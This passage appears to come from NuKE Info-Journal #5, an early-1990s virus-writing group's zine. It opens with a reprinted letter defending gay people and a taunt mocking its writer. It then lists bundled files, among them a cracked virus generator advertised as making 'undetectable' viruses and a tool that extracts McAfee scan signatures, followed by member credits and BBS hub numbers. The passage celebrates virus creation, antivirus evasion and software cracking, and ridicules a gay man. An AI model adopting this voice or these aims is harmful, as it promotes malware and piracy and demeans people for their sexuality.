a sexual disease, had close to
500 partners (wow!), and abused
children to boot.
As to the transfusions of
blood, I guess the rest of the
world is less risky, with 90 per-
cent of HIV infections world-
wide being within the heterosexual
sphere. Furthermore, the ter-
minology you attempt to use,
pro-gay sensitivity or re-educa-
tion classes, is laughable.
All we're asking is to be
treated with respect as human
beings. The rest of the world
lives with these gay people; why
in the hell shouldn't you? Rec-
ognize the right to be human in
all our ways.

Gary Watson

^^^^^^^^^^^
Aha! So the truth finally comes out, Gary! We all knew it all along!
I'm just glad that you came out of the closet by submitting your letter
to a major newspaper...

Nowhere Man/NuKE
===========================================================================
===========================================================================
Files Included With NuKE Info-Journal #5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DETECTOR.ZIP
~~~~~~~~~~~~
Included with this kit are a few .ZIPs that our two good friends
wrote. The first is called DETECTOR.ZIP. It consists of a
"strain extractor" by Savage Beast/NuKE. This software will be able
to help you catch your funny viruses when no scanner finds them.
Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They
should be infected; then reset your computer and execute the
DETECTOR program. Have fun and use the program in good health!

Provided by: Savage Beast


GENVIRUS.ZIP
~~~~~~~~~~~~
GenVirus is a virus generator developed in France. This program was
ORIGINALLY in French, and "crippled," meaning you had to send the
dickweed programmer mondo money for a legit copy. So we gave it
to Rock Steady, who cracked the shit out of the file! Being in Canada
and stranded in Quebec (French-Pepper land), Rock Steady was able to
translate the WHOLE GenVirus program into English! It was tough, being
written in C++, but once you live and breathe ASM it's just a matter of
time. Anyhow, thanks to Savage Beast for getting us a copy of this program!
REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE!
The program ONLY compiles binary code, and attaches the virus to a
"dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0
(VCL changed the WHOLE WORLD!), and still goes undetected, as people
were never able to crack the program...<hehe>

Provided by: Savage Beast
Cracked by: Rock Steady


MCAFEE.STR
~~~~~~~~~~
MCAFEE.STR is a product of Screaming Radish from Australia that extracts all
virus signatures from any version of McAfee Scan. We are unable to release
the product in this info journal, as McAfee may restructure the format in
which they save virus signatures (they can do so by simply making one or
two small adjustments); therefore this program is not available to the
general public. But if you want a copy, call any of the NuKE Support
systems.

Provided by: Screaming Radish

The NuKE Associates
===========================================================================
===========================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK                                   E-
KE             CREDITS               -N
E-                                   Nu
-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK

NuKE would like to send its extended thanks to all supporters and members
that have put themselves on the line to be with us. Mainly:

Death Angel (416) [Thanks for your support! (And source!)]
Rock Steady (514) [You have the right to remain silent. You..]
Pure Energy (514) [I have a Board? Naaa...]
Silent Shadow (514) [What?, Who?, How?, When?, Where?, Why?]
Nowhere Man (708) [See, no capital "W" Nowhere!]
ARiSToTLE (804) [TRISKAIDEKAPHOBIA - one of a kind dude.]
FireCracker (804) [Huh, VGA? Whats VGA? Gimme my money back!]
Dark Angel (819) [Can't have a group without you, huh?]
Savage Beast (+41) [Hey where's my limo???]
Ford Fairlane (+46) [That's for staying on our side!]
Tormentor/DY (+46) ["Fame" is truely an evil]
Phrozen Doberman (+61) [Gooooood Daaaaay...]
Screaming Radish (+61) [Beastiality you say?...humm]
TäLöN (+61) [Where's my XXX calendar of the AVers?]
Shidaq Arl'hur (+61) [Welcome aboard mate!]
The Wierd One (+61) [FCB, how's it taste?]
The Dark Elf (+61) [Scan strings, who needs scan strings?]

(Ordered by area/country code. We don't like to play favourites!)

Anyhow, if I missed anyone SIMPLY send me e-mail; no credit ruining, no
letter bombs, PLEASE! But I believe I put in everyone who has contributed
a lot to the NuKE Team, and we thank you in return.


NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites
---------------------------------------------------------------------------
├───[BBS Name]───────[Phone Number][Modem]──[SysOp]────────────[NuKE-Net]──┤
 Cybernetic Violence. 514-425-4540   V32Bis  Pure Energy       American HUB
 Total Mayhem........+613-ASK-NUKE   HST/DS  Phrozen Doberman  Australian HUB
 Enigma E:N:U:N.....+41-22-3400329   V32Bis  Savage Beast      European HUB
├──────────────────────────────────────────────────────────────────────────┤

I listed only the HUB systems, as that is always where you can reach any
of us for sure. We do have many other systems, but since this file will
not be encrypted I didn't wish to post them, for reasons of security. If you
wish to join NuKENET, simply call up the hub closest to your area, and
you will be added to it.

Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto,
Detroit, Chicago, Philadelphia, Richmond, Stockholm, Göteborg, Geneva,
Amsterdam, Sofia, Melbourne, and Brisbane.

Remember, the main rules for NuKENET are that you must call the system up
every 2-3 days; anything less frequent will purge you from our net. No
illegalities, no codes and material like that (they will be turned over to
the appropriate law enforcement!). And we insist on an active system -- one
post per month ain't our idea of active.

Rock Steady/NuKE
===========================================================================